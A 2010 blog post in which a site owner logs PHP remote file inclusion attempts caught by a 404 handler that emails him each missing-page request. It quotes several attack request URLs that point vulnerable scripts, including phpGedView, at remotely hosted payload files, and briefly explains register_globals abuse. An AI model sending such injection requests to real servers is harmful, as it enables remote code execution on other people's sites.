Thursday, February 4, 2010

Examples of ongoing web site injection attacks I am experiencing

I'm no security professional. When it comes to security, my eyes glaze over and I feel lost. But to get a better feel for the broken links at my sites, I recently edited my .htaccess file to include this line:

ErrorDocument 404 /404.php


Then I put this line into my 404.php:

mail('me@myserver.com',"$_SERVER[REQUEST_URI] file not found at mysite.com","Referred by: $_SERVER[HTTP_REFERER]\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]");


What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:

2010 February 4


/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?
This is apparently a random url sent in the hope that I may have a main.php file that will accept this remote page to display and do more mischief. I wager this is a signature vulnerability of some popular web software package.

//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???
I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the php setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command line and file mischief with php scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. register_globals has long been recommended to be off, not on, due to this type of vulnerability. register_globals being on lets HTML GET and POST variables be registered as regular php global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.

2010 February 11


//errors.php?error=http://www.cienciacompartida.org////id1.txt???
This one is guessing I have an errors.php file that will do something fun with the url they are providing.

No comments: